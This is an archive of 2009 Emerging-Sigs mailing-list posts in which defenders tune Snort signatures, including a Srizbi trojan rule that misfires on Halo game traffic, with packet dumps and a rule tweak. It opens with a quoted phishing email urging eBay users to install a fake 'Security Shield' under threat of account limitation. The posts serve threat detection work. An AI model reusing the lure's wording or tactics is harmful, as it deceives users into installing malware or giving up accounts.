> We have detected security issues on behalf your account, in order to use
> eBay in the future you have to download and install the eBay Security
> Shield by following this steps:
>
> 1. Click here
> <http://members.ebay.com/ws/eBayISAPI.dll?ViewUserPage&userid=captainoversteer&livehelp.ebay/offers/sotwere/userfree-softwere/getEbayS%20SecurityShield%20?%ll?ViewUserPage&userid=20a%20gll?ViewUserPage&userid=55%5e%R>
> to download the eBay Security Shield
> 2. After the download is complete install the program
> 3. Log in to the sign in page and confirm the program installation
>
> Please keep in mind that if you don?t install eBay Protection Shield,
> you'll be subject to an account limitation. Once you have reached this
> limit, you won't be able to access your account.
>
>
> Regards,
> eBay
>
>
> Copyright ? 2009 eBay Inc. All Rights Reserved.
> Designated trademarks and brands are the property of their respective
> owners.
>
> eBay and the eBay logo are trademarks of eBay Inc.
>
>
> --
>
>
> mex
>
>
> Security InfoCenter ? .:. ? http://www.mare-system.de/sic
> DONT PANIC ? ? ? ? ? ?.:. ? http://www.mare-system.de/emergency
> MARE System Kiel ? ? ?.:. ? http://www.mare-system.de
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Jamie Riden / jamie at honeynet.org / jamie.riden at gmail.com
http://www.ukhoneynet.org/members/jamie/

From guise.mcallaster at gmail.com  Tue Dec  8 12:19:04 2009
From: guise.mcallaster at gmail.com (Guise McAllaster)
Date: Tue, 8 Dec 2009 17:19:04 +0000
Subject: [Emerging-Sigs] Fwd: [Snort-sigs] stream5 and
	use_static_footprint_sizes
In-Reply-To: <77e259cc0912080901x2e40c2a0o81c4187e1f0e67cf@mail.gmail.com>
References: <ab3c24b60912071344r11adc278lbc035838f8e3a607@mail.gmail.com>
	<4B1D837E.8040607@sourcefire.com>
	<ab3c24b60912080753m288d7865ldef20bb96e7ef08@mail.gmail.com>
	<d3a3e6ac0912080843i17a0302te36548e032b4b013@mail.gmail.com>
	<77e259cc0912080901x2e40c2a0o81c4187e1f0e67cf@mail.gmail.com>
Message-ID: <ab3c24b60912080919n7c6f041am59ec9e030cad0f9d@mail.gmail.com>

FYI.  Sourcefire's tendency to bottom-post can make the thread hard to read
but basically the use_static_footprint_sizes parameter for the streams5
preprocessor is enabled by default and shouldn't be.  Full thread should be
available in the snort-sigs mailing list archives.

--Guise

---------- Forwarded message ----------
From: Matt Olney <molney at sourcefire.com>
Date: Tue, Dec 8, 2009 at 5:01 PM
Subject: Re: [Snort-sigs] stream5 and use_static_footprint_sizes
To: bmc at snort.org
Cc: Guise McAllaster <guise.mcallaster at gmail.com>, Snort Sigs <
snort-sigs at lists.sourceforge.net>


Thanks Brian,

But especially, thanks Guise for catching this, the VRT loves getting info
back from the community, especially when it will benefit all of our Snort
users.

Thanks!!

Matt
(VRT)

On Tue, Dec 8, 2009 at 11:43 AM, Brian Caswell <bmc at snort.org> wrote:

> On Tue, Dec 8, 2009 at 10:53 AM, Guise McAllaster
> <guise.mcallaster at gmail.com> wrote:
> > Todd,
> >
> > Thanks for this response, I really appreciate it.  From what you say and
> > what I have reads, it seems that using use_static_footprint_sizes is not
> > recommended.  However, I am puzzled because I just did a generic snort
> > install (using Ubuntu and apt-get) and I notice that
> > use_static_footprint_sizes IS enabled.  But why?
> >
> > --Guise
>
> This is an oversight.  It is currently enabled in both the default
> snort.conf provided in the official releases of Snort as well as the
> VRT provided rulepacks.
>
> An update to the VRT provided rulepacks will be released soon that
> will correct this oversight.  The default snort.conf provided in the
> official releases of Snort will be updated upon the next release of
> Snort.
>
>
> Brian
>
>
> ------------------------------------------------------------------------------
> Return on Information:
> Google Enterprise Search pays you back
> Get the facts.
> http://p.sf.net/sfu/google-dev2dev
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091208/c9de99a1/attachment.html

From cunningpike at gmail.com  Tue Dec  8 12:59:28 2009
From: cunningpike at gmail.com (CunningPike)
Date: Tue, 8 Dec 2009 09:59:28 -0800
Subject: [Emerging-Sigs] 2007711: ET TROJAN Srizbi registering
	withcontroller
In-Reply-To: <4B1E5A6E.1020403@packetmail.net>
References: <f1b6c340912071401w46777282n1de2d09435917a96@mail.gmail.com>
	<4B1D8CBC.1060208@packetmail.net>
	<f1b6c340912071624q22ae14adi50857e3f17c4a67b@mail.gmail.com>
	<4B1E5A6E.1020403@packetmail.net>
Message-ID: <f1b6c340912080959h2373f497o90441286c0ab9a94@mail.gmail.com>

Not a bad idea - additionally, the Symantec analysis here
(http://www.symantec.com/security_response/writeup.jsp?docid=2007-062007-0946-99&tabid=2)
lists hosts that the malware attempts to contact. There might be an
opportunity to narrow the scope of the rule there also.

CP

On Tue, Dec 8, 2009 at 5:53 AM, evilghost at packetmail.net
<evilghost at packetmail.net> wrote:
> That's a different host, 189.242.31.77 versus 67.161.16.105. ?It looks
> like UDP 2302 is used for Halo but I'm not sure I understand the
> direction. ?In the first rule I would assume 2302 UDP is the data port
> for the hosted session yet in the below packet I see 2302 being accessed
> in the RFC1918 space. ?According to the data I've been able to find 2302
> and 2303 UDP are used for Halo DS (dedicated server). ?Might modify the
> rule to ignore these ports instead of relying on payload matching?
>
>
>
> CunningPike wrote:
>> That's not the alerting packet though - this is:
>>
>> Count:4 Event#5.346824 2009-12-04 23:51:02
>> ET TROJAN Srizbi registering with controller
>> 192.168.132.111 -> 189.242.31.77
>> IPVer=4 hlen=5 tos=0 dlen=48 ID=7197 flags=0 offset=0 ttl=126 chksum=65096
>> Protocol: 17 sport=2303 -> dport=2302
>>
>> len=28 chksum=15571
>> Payload:
>> FE FE 00 02 83 00 A0 C5 E1 6F 2D 9A C7 45 CA 6E .........o-..E.n
>> FE 2D CC DA ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? .-..
>>
>> The packet I posted was from prior traffic from the same host and is a
>> pattern we have observed before.
>>
>> CP
>>
>> On Mon, Dec 7, 2009 at 3:16 PM, evilghost at packetmail.net
>> <evilghost at packetmail.net> wrote:
>>
>>> It's Halo;
>>> http://www.game-monitor.com/haloce_GameServer/67.161.16.105:2302/SoL_clan-_CE_Stuntingwhatever_server.html
>>>
>>> Perhaps a negated content against content:!"|00|server."; offset:44; on
>>> SID 2007711?
>>>
>>> Double-check my offset please.
>>>
>>> -evilghost
>>>
>>> CunningPike wrote:
>>>
>>>> I'm seeing alerts on this rule associated with what I think is Halo
>>>> online game activity - anyone else? The port involved is 2302.
>>>>
>>>> This is the sort of traffic we are seeing on the wire after the rule
>>>> fires an alert:
>>>>
>>>> Count:1 Event#5.347574 2009-12-06 20:19:13
>>>> ET MALWARE SOCKSv5 UDP Proxy Inbound Connect Request (Windows Source)
>>>> 67.161.16.105 -> 192.168.132.103
>>>> IPVer=4 hlen=5 tos=0 dlen=113 ID=0 flags=2 offset=0 ttl=52 chksum=44386
>>>> Protocol: 17 sport=2302 -> dport=1110
>>>>
>>>> len=93 chksum=28461
>>>> Payload:
>>>> 00 00 AB 01 00 53 6F 4C 20 63 6C 61 6E 2D 20 28 .....SoL clan- (
>>>> 43 45 29 20 53 74 75 6E 74 69 6E 67 2F 77 68 61 CE) Stunting/wha
>>>> 74 65 76 65 72 20 73 65 72 76 65 72 00 30 31 2E tever server.01.
>>>> 30 30 2E 30 39 2E 30 36 32 30 00 30 00 31 36 00 00.09.0620.0.16.
>>>> 63 6F 6C 64 73 6E 61 70 00 43 54 46 00 30 00 31 coldsnap.CTF.0.1
>>>> 00 30 00 31 00 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?.0.1.
>>>>
>>>> Some Googling of 'coldsnap.CTF' turns up a lot of references to Halo gaming.
>>>>
>>>> CP
>>>> _______________________________________________
>>>> Emerging-sigs mailing list
>>>> Emerging-sigs at emergingthreats.net
>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>
>>>>
>>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>>
>

From jonkman at jonkmans.com  Tue Dec  8 13:47:17 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 8 Dec 2009 13:47:17 -0500
Subject: [Emerging-Sigs] 2007711: ET TROJAN Srizbi registering
	withcontroller
In-Reply-To: <f1b6c340912080959h2373f497o90441286c0ab9a94@mail.gmail.com>
References: <f1b6c340912071401w46777282n1de2d09435917a96@mail.gmail.com>
	<4B1D8CBC.1060208@packetmail.net>
	<f1b6c340912071624q22ae14adi50857e3f17c4a67b@mail.gmail.com>
	<4B1E5A6E.1020403@packetmail.net>
	<f1b6c340912080959h2373f497o90441286c0ab9a94@mail.gmail.com>
Message-ID: <822AAFB8-9167-44CE-A789-276AD458D055@jonkmans.com>

I'm scared of port negation, if I were running a botnet I'd have some fun and hardcode to that port for a bit. We could catch them of course if we get a sample in the sandnet and it's not detected, but the flaw remains.

Of course we've never been afraid of running rules with flaws to serve the greater good. 

So Halo is always 2302? If so maybe it's safe to negate...

Matt

On Dec 8, 2009, at 12:59 PM, CunningPike wrote:

> Not a bad idea - additionally, the Symantec analysis here
> (http://www.symantec.com/security_response/writeup.jsp?docid=2007-062007-0946-99&tabid=2)
> lists hosts that the malware attempts to contact. There might be an
> opportunity to narrow the scope of the rule there also.
> 
> CP
> 
> On Tue, Dec 8, 2009 at 5:53 AM, evilghost at packetmail.net
> <evilghost at packetmail.net> wrote:
>> That's a different host, 189.242.31.77 versus 67.161.16.105.  It looks
>> like UDP 2302 is used for Halo but I'm not sure I understand the
>> direction.  In the first rule I would assume 2302 UDP is the data port
>> for the hosted session yet in the below packet I see 2302 being accessed
>> in the RFC1918 space.  According to the data I've been able to find 2302
>> and 2303 UDP are used for Halo DS (dedicated server).  Might modify the
>> rule to ignore these ports instead of relying on payload matching?
>> 
>> 
>> 
>> CunningPike wrote:
>>> That's not the alerting packet though - this is:
>>> 
>>> Count:4 Event#5.346824 2009-12-04 23:51:02
>>> ET TROJAN Srizbi registering with controller
>>> 192.168.132.111 -> 189.242.31.77
>>> IPVer=4 hlen=5 tos=0 dlen=48 ID=7197 flags=0 offset=0 ttl=126 chksum=65096
>>> Protocol: 17 sport=2303 -> dport=2302
>>> 
>>> len=28 chksum=15571
>>> Payload:
>>> FE FE 00 02 83 00 A0 C5 E1 6F 2D 9A C7 45 CA 6E .........o-..E.n
>>> FE 2D CC DA                                     .-..
>>> 
>>> The packet I posted was from prior traffic from the same host and is a
>>> pattern we have observed before.
>>> 
>>> CP
>>> 
>>> On Mon, Dec 7, 2009 at 3:16 PM, evilghost at packetmail.net
>>> <evilghost at packetmail.net> wrote:
>>> 
>>>> It's Halo;
>>>> http://www.game-monitor.com/haloce_GameServer/67.161.16.105:2302/SoL_clan-_CE_Stuntingwhatever_server.html
>>>> 
>>>> Perhaps a negated content against content:!"|00|server."; offset:44; on
>>>> SID 2007711?
>>>> 
>>>> Double-check my offset please.
>>>> 
>>>> -evilghost
>>>> 
>>>> CunningPike wrote:
>>>> 
>>>>> I'm seeing alerts on this rule associated with what I think is Halo
>>>>> online game activity - anyone else? The port involved is 2302.
>>>>> 
>>>>> This is the sort of traffic we are seeing on the wire after the rule
>>>>> fires an alert:
>>>>> 
>>>>> Count:1 Event#5.347574 2009-12-06 20:19:13
>>>>> ET MALWARE SOCKSv5 UDP Proxy Inbound Connect Request (Windows Source)
>>>>> 67.161.16.105 -> 192.168.132.103
>>>>> IPVer=4 hlen=5 tos=0 dlen=113 ID=0 flags=2 offset=0 ttl=52 chksum=44386
>>>>> Protocol: 17 sport=2302 -> dport=1110
>>>>> 
>>>>> len=93 chksum=28461
>>>>> Payload:
>>>>> 00 00 AB 01 00 53 6F 4C 20 63 6C 61 6E 2D 20 28 .....SoL clan- (
>>>>> 43 45 29 20 53 74 75 6E 74 69 6E 67 2F 77 68 61 CE) Stunting/wha
>>>>> 74 65 76 65 72 20 73 65 72 76 65 72 00 30 31 2E tever server.01.
>>>>> 30 30 2E 30 39 2E 30 36 32 30 00 30 00 31 36 00 00.09.0620.0.16.
>>>>> 63 6F 6C 64 73 6E 61 70 00 43 54 46 00 30 00 31 coldsnap.CTF.0.1
>>>>> 00 30 00 31 00                                  .0.1.
>>>>> 
>>>>> Some Googling of 'coldsnap.CTF' turns up a lot of references to Halo gaming.
>>>>> 
>>>>> CP
>>>>> _______________________________________________
>>>>> Emerging-sigs mailing list
>>>>> Emerging-sigs at emergingthreats.net
>>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>> 
>>>>> 
>>>>> 
>>>> _______________________________________________
>>>> Emerging-sigs mailing list
>>>> Emerging-sigs at emergingthreats.net
>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>> 
>>>> 
>> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From cunningpike at gmail.com  Tue Dec  8 14:02:10 2009
From: cunningpike at gmail.com (CunningPike)
Date: Tue, 8 Dec 2009 11:02:10 -0800
Subject: [Emerging-Sigs] 2007711: ET TROJAN Srizbi registering
	withcontroller
In-Reply-To: <822AAFB8-9167-44CE-A789-276AD458D055@jonkmans.com>
References: <f1b6c340912071401w46777282n1de2d09435917a96@mail.gmail.com>
	<4B1D8CBC.1060208@packetmail.net>
	<f1b6c340912071624q22ae14adi50857e3f17c4a67b@mail.gmail.com>
	<4B1E5A6E.1020403@packetmail.net>
	<f1b6c340912080959h2373f497o90441286c0ab9a94@mail.gmail.com>
	<822AAFB8-9167-44CE-A789-276AD458D055@jonkmans.com>
Message-ID: <f1b6c340912081102s50567ed6q65b6a82e44783904@mail.gmail.com>

FWIW it's worth, I share your reluctance to introduce port negation
into rules like these. Perhaps leave the rule as it is and leave it up
to folks like me to decide to use oinkmaster/whatever to add the port
negation themselves. Fits in with the overall emphasis on tuning one's
IDS ruleset to match one's environment.

CP

On Tue, Dec 8, 2009 at 10:47 AM, Matt Jonkman <jonkman at jonkmans.com> wrote:
> I'm scared of port negation, if I were running a botnet I'd have some fun and hardcode to that port for a bit. We could catch them of course if we get a sample in the sandnet and it's not detected, but the flaw remains.
>
> Of course we've never been afraid of running rules with flaws to serve the greater good.
>
> So Halo is always 2302? If so maybe it's safe to negate...
>
> Matt
>
> On Dec 8, 2009, at 12:59 PM, CunningPike wrote:
>
>> Not a bad idea - additionally, the Symantec analysis here
>> (http://www.symantec.com/security_response/writeup.jsp?docid=2007-062007-0946-99&tabid=2)
>> lists hosts that the malware attempts to contact. There might be an
>> opportunity to narrow the scope of the rule there also.
>>
>> CP
>>
>> On Tue, Dec 8, 2009 at 5:53 AM, evilghost at packetmail.net
>> <evilghost at packetmail.net> wrote:
>>> That's a different host, 189.242.31.77 versus 67.161.16.105. ?It looks
>>> like UDP 2302 is used for Halo but I'm not sure I understand the
>>> direction. ?In the first rule I would assume 2302 UDP is the data port
>>> for the hosted session yet in the below packet I see 2302 being accessed
>>> in the RFC1918 space. ?According to the data I've been able to find 2302
>>> and 2303 UDP are used for Halo DS (dedicated server). ?Might modify the
>>> rule to ignore these ports instead of relying on payload matching?
>>>
>>>
>>>
>>> CunningPike wrote:
>>>> That's not the alerting packet though - this is:
>>>>
>>>> Count:4 Event#5.346824 2009-12-04 23:51:02
>>>> ET TROJAN Srizbi registering with controller
>>>> 192.168.132.111 -> 189.242.31.77
>>>> IPVer=4 hlen=5 tos=0 dlen=48 ID=7197 flags=0 offset=0 ttl=126 chksum=65096
>>>> Protocol: 17 sport=2303 -> dport=2302
>>>>
>>>> len=28 chksum=15571
>>>> Payload:
>>>> FE FE 00 02 83 00 A0 C5 E1 6F 2D 9A C7 45 CA 6E .........o-..E.n
>>>> FE 2D CC DA ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? .-..
>>>>
>>>> The packet I posted was from prior traffic from the same host and is a
>>>> pattern we have observed before.
>>>>
>>>> CP
>>>>
>>>> On Mon, Dec 7, 2009 at 3:16 PM, evilghost at packetmail.net
>>>> <evilghost at packetmail.net> wrote:
>>>>
>>>>> It's Halo;
>>>>> http://www.game-monitor.com/haloce_GameServer/67.161.16.105:2302/SoL_clan-_CE_Stuntingwhatever_server.html
>>>>>
>>>>> Perhaps a negated content against content:!"|00|server."; offset:44; on
>>>>> SID 2007711?
>>>>>
>>>>> Double-check my offset please.
>>>>>
>>>>> -evilghost
>>>>>
>>>>> CunningPike wrote:
>>>>>
>>>>>> I'm seeing alerts on this rule associated with what I think is Halo
>>>>>> online game activity - anyone else? The port involved is 2302.
>>>>>>
>>>>>> This is the sort of traffic we are seeing on the wire after the rule
>>>>>> fires an alert:
>>>>>>
>>>>>> Count:1 Event#5.347574 2009-12-06 20:19:13
>>>>>> ET MALWARE SOCKSv5 UDP Proxy Inbound Connect Request (Windows Source)
>>>>>> 67.161.16.105 -> 192.168.132.103
>>>>>> IPVer=4 hlen=5 tos=0 dlen=113 ID=0 flags=2 offset=0 ttl=52 chksum=44386
>>>>>> Protocol: 17 sport=2302 -> dport=1110
>>>>>>
>>>>>> len=93 chksum=28461
>>>>>> Payload:
>>>>>> 00 00 AB 01 00 53 6F 4C 20 63 6C 61 6E 2D 20 28 .....SoL clan- (
>>>>>> 43 45 29 20 53 74 75 6E 74 69 6E 67 2F 77 68 61 CE) Stunting/wha
>>>>>> 74 65 76 65 72 20 73 65 72 76 65 72 00 30 31 2E tever server.01.
>>>>>> 30 30 2E 30 39 2E 30 36 32 30 00 30 00 31 36 00 00.09.0620.0.16.
>>>>>> 63 6F 6C 64 73 6E 61 70 00 43 54 46 00 30 00 31 coldsnap.CTF.0.1
>>>>>> 00 30 00 31 00 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?.0.1.
>>>>>>
>>>>>> Some Googling of 'coldsnap.CTF' turns up a lot of references to Halo gaming.
>>>>>>
>>>>>> CP
>>>>>> _______________________________________________
>>>>>> Emerging-sigs mailing list
>>>>>> Emerging-sigs at emergingthreats.net
>>>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>>>
>>>>>>
>>>>>>
>>>>> _______________________________________________
>>>>> Emerging-sigs mailing list
>>>>> Emerging-sigs at emergingthreats.net
>>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>>
>>>>>
>>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>
> ----------------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> ----------------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
>
>

From jonkman at jonkmans.com  Tue Dec  8 14:11:49 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 8 Dec 2009 14:11:49 -0500
Subject: [Emerging-Sigs] 2007711: ET TROJAN Srizbi registering
	withcontroller
In-Reply-To: <f1b6c340912081102s50567ed6q65b6a82e44783904@mail.gmail.com>
References: <f1b6c340912071401w46777282n1de2d09435917a96@mail.gmail.com>
	<4B1D8CBC.1060208@packetmail.net>
	<f1b6c340912071624q22ae14adi50857e3f17c4a67b@mail.gmail.com>
	<4B1E5A6E.1020403@packetmail.net>
	<f1b6c340912080959h2373f497o90441286c0ab9a94@mail.gmail.com>
	<822AAFB8-9167-44CE-A789-276AD458D055@jonkmans.com>
	<f1b6c340912081102s50567ed6q65b6a82e44783904@mail.gmail.com>
Message-ID: <BD0F82AB-A52A-4F2B-B9B4-C0644737D888@jonkmans.com>

Good points.

Conversely, how often will we see Halo on a 'normal' (i.e. not home) network? Is it worth the negation considering that?

Matt

On Dec 8, 2009, at 2:02 PM, CunningPike wrote:

> FWIW it's worth, I share your reluctance to introduce port negation
> into rules like these. Perhaps leave the rule as it is and leave it up
> to folks like me to decide to use oinkmaster/whatever to add the port
> negation themselves. Fits in with the overall emphasis on tuning one's
> IDS ruleset to match one's environment.
> 
> CP
> 
> On Tue, Dec 8, 2009 at 10:47 AM, Matt Jonkman <jonkman at jonkmans.com> wrote:
>> I'm scared of port negation, if I were running a botnet I'd have some fun and hardcode to that port for a bit. We could catch them of course if we get a sample in the sandnet and it's not detected, but the flaw remains.
>> 
>> Of course we've never been afraid of running rules with flaws to serve the greater good.
>> 
>> So Halo is always 2302? If so maybe it's safe to negate...
>> 
>> Matt
>> 
>> On Dec 8, 2009, at 12:59 PM, CunningPike wrote:
>> 
>>> Not a bad idea - additionally, the Symantec analysis here
>>> (http://www.symantec.com/security_response/writeup.jsp?docid=2007-062007-0946-99&tabid=2)
>>> lists hosts that the malware attempts to contact. There might be an
>>> opportunity to narrow the scope of the rule there also.
>>> 
>>> CP
>>> 
>>> On Tue, Dec 8, 2009 at 5:53 AM, evilghost at packetmail.net
>>> <evilghost at packetmail.net> wrote:
>>>> That's a different host, 189.242.31.77 versus 67.161.16.105.  It looks
>>>> like UDP 2302 is used for Halo but I'm not sure I understand the
>>>> direction.  In the first rule I would assume 2302 UDP is the data port
>>>> for the hosted session yet in the below packet I see 2302 being accessed
>>>> in the RFC1918 space.  According to the data I've been able to find 2302
>>>> and 2303 UDP are used for Halo DS (dedicated server).  Might modify the
>>>> rule to ignore these ports instead of relying on payload matching?
>>>> 
>>>> 
>>>> 
>>>> CunningPike wrote:
>>>>> That's not the alerting packet though - this is:
>>>>> 
>>>>> Count:4 Event#5.346824 2009-12-04 23:51:02
>>>>> ET TROJAN Srizbi registering with controller
>>>>> 192.168.132.111 -> 189.242.31.77
>>>>> IPVer=4 hlen=5 tos=0 dlen=48 ID=7197 flags=0 offset=0 ttl=126 chksum=65096
>>>>> Protocol: 17 sport=2303 -> dport=2302
>>>>> 
>>>>> len=28 chksum=15571
>>>>> Payload:
>>>>> FE FE 00 02 83 00 A0 C5 E1 6F 2D 9A C7 45 CA 6E .........o-..E.n
>>>>> FE 2D CC DA                                     .-..
>>>>> 
>>>>> The packet I posted was from prior traffic from the same host and is a
>>>>> pattern we have observed before.
>>>>> 
>>>>> CP
>>>>> 
>>>>> On Mon, Dec 7, 2009 at 3:16 PM, evilghost at packetmail.net
>>>>> <evilghost at packetmail.net> wrote:
>>>>> 
>>>>>> It's Halo;
>>>>>> http://www.game-monitor.com/haloce_GameServer/67.161.16.105:2302/SoL_clan-_CE_Stuntingwhatever_server.html
>>>>>> 
>>>>>> Perhaps a negated content against content:!"|00|server."; offset:44; on
>>>>>> SID 2007711?
>>>>>> 
>>>>>> Double-check my offset please.
>>>>>> 
>>>>>> -evilghost
>>>>>> 
>>>>>> CunningPike wrote:
>>>>>> 
>>>>>>> I'm seeing alerts on this rule associated with what I think is Halo
>>>>>>> online game activity - anyone else? The port involved is 2302.
>>>>>>> 
>>>>>>> This is the sort of traffic we are seeing on the wire after the rule
>>>>>>> fires an alert:
>>>>>>> 
>>>>>>> Count:1 Event#5.347574 2009-12-06 20:19:13
>>>>>>> ET MALWARE SOCKSv5 UDP Proxy Inbound Connect Request (Windows Source)
>>>>>>> 67.161.16.105 -> 192.168.132.103
>>>>>>> IPVer=4 hlen=5 tos=0 dlen=113 ID=0 flags=2 offset=0 ttl=52 chksum=44386
>>>>>>> Protocol: 17 sport=2302 -> dport=1110
>>>>>>> 
>>>>>>> len=93 chksum=28461
>>>>>>> Payload:
>>>>>>> 00 00 AB 01 00 53 6F 4C 20 63 6C 61 6E 2D 20 28 .....SoL clan- (
>>>>>>> 43 45 29 20 53 74 75 6E 74 69 6E 67 2F 77 68 61 CE) Stunting/wha
>>>>>>> 74 65 76 65 72 20 73 65 72 76 65 72 00 30 31 2E tever server.01.
>>>>>>> 30 30 2E 30 39 2E 30 36 32 30 00 30 00 31 36 00 00.09.0620.0.16.
>>>>>>> 63 6F 6C 64 73 6E 61 70 00 43 54 46 00 30 00 31 coldsnap.CTF.0.1
>>>>>>> 00 30 00 31 00                                  .0.1.
>>>>>>> 
>>>>>>> Some Googling of 'coldsnap.CTF' turns up a lot of references to Halo gaming.
>>>>>>> 
>>>>>>> CP
>>>>>>> _______________________________________________
>>>>>>> Emerging-sigs mailing list
>>>>>>> Emerging-sigs at emergingthreats.net
>>>>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>>>> 
>>>>>>> 
>>>>>>> 
>>>>>> _______________________________________________
>>>>>> Emerging-sigs mailing list
>>>>>> Emerging-sigs at emergingthreats.net
>>>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>>> 
>>>>>> 
>>>> 
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>> 
>> 
>> ----------------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Open Information Security Foundation (OISF)
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> http://www.openinformationsecurityfoundation.org
>> ----------------------------------------------------
>> 
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>> 
>> 
>> 
>> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From evilghost at packetmail.net  Tue Dec  8 14:20:26 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Tue, 8 Dec 2009 13:20:26 -0600
Subject: [Emerging-Sigs] 2007711: ET TROJAN Srizbi
	registeringwithcontroller
In-Reply-To: <BD0F82AB-A52A-4F2B-B9B4-C0644737D888@jonkmans.com>
References: <f1b6c340912071401w46777282n1de2d09435917a96@mail.gmail.com>	<4B1D8CBC.1060208@packetmail.net>	<f1b6c340912071624q22ae14adi50857e3f17c4a67b@mail.gmail.com>	<4B1E5A6E.1020403@packetmail.net>	<f1b6c340912080959h2373f497o90441286c0ab9a94@mail.gmail.com>	<822AAFB8-9167-44CE-A789-276AD458D055@jonkmans.com>	<f1b6c340912081102s50567ed6q65b6a82e44783904@mail.gmail.com>
	<BD0F82AB-A52A-4F2B-B9B4-C0644737D888@jonkmans.com>
Message-ID: <4B1EA6FA.5030909@packetmail.net>

My thoughts too.  This would be another "beneficial false positive".  If 
I saw it on my network I would probably fire up a Halo client and 
connect to the server with the name "{COMPANY} IDS/Security" and troll 
them.  Or firewall block/unblock/annoy the 1918 source.

Matt Jonkman wrote:
> Good points.
>
> Conversely, how often will we see Halo on a 'normal' (i.e. not home) network? Is it worth the negation considering that?
>
> Matt
>
> On Dec 8, 2009, at 2:02 PM, CunningPike wrote:
>
>   
>> FWIW it's worth, I share your reluctance to introduce port negation
>> into rules like these. Perhaps leave the rule as it is and leave it up
>> to folks like me to decide to use oinkmaster/whatever to add the port
>> negation themselves. Fits in with the overall emphasis on tuning one's
>> IDS ruleset to match one's environment.
>>
>> CP
>>
>> On Tue, Dec 8, 2009 at 10:47 AM, Matt Jonkman <jonkman at jonkmans.com> wrote:
>>     
>>> I'm scared of port negation, if I were running a botnet I'd have some fun and hardcode to that port for a bit. We could catch them of course if we get a sample in the sandnet and it's not detected, but the flaw remains.
>>>
>>> Of course we've never been afraid of running rules with flaws to serve the greater good.
>>>
>>> So Halo is always 2302? If so maybe it's safe to negate...
>>>
>>> Matt
>>>
>>> On Dec 8, 2009, at 12:59 PM, CunningPike wrote:
>>>
>>>       
>>>> Not a bad idea - additionally, the Symantec analysis here
>>>> (http://www.symantec.com/security_response/writeup.jsp?docid=2007-062007-0946-99&tabid=2)
>>>> lists hosts that the malware attempts to contact. There might be an
>>>> opportunity to narrow the scope of the rule there also.
>>>>
>>>> CP
>>>>
>>>> On Tue, Dec 8, 2009 at 5:53 AM, evilghost at packetmail.net
>>>> <evilghost at packetmail.net> wrote:
>>>>         
>>>>> That's a different host, 189.242.31.77 versus 67.161.16.105.  It looks
>>>>> like UDP 2302 is used for Halo but I'm not sure I understand the
>>>>> direction.  In the first rule I would assume 2302 UDP is the data port
>>>>> for the hosted session yet in the below packet I see 2302 being accessed
>>>>> in the RFC1918 space.  According to the data I've been able to find 2302
>>>>> and 2303 UDP are used for Halo DS (dedicated server).  Might modify the
>>>>> rule to ignore these ports instead of relying on payload matching?
>>>>>
>>>>>
>>>>>
>>>>> CunningPike wrote:
>>>>>           
>>>>>> That's not the alerting packet though - this is:
>>>>>>
>>>>>> Count:4 Event#5.346824 2009-12-04 23:51:02
>>>>>> ET TROJAN Srizbi registering with controller
>>>>>> 192.168.132.111 -> 189.242.31.77
>>>>>> IPVer=4 hlen=5 tos=0 dlen=48 ID=7197 flags=0 offset=0 ttl=126 chksum=65096
>>>>>> Protocol: 17 sport=2303 -> dport=2302
>>>>>>
>>>>>> len=28 chksum=15571
>>>>>> Payload:
>>>>>> FE FE 00 02 83 00 A0 C5 E1 6F 2D 9A C7 45 CA 6E .........o-..E.n
>>>>>> FE 2D CC DA                                     .-..
>>>>>>
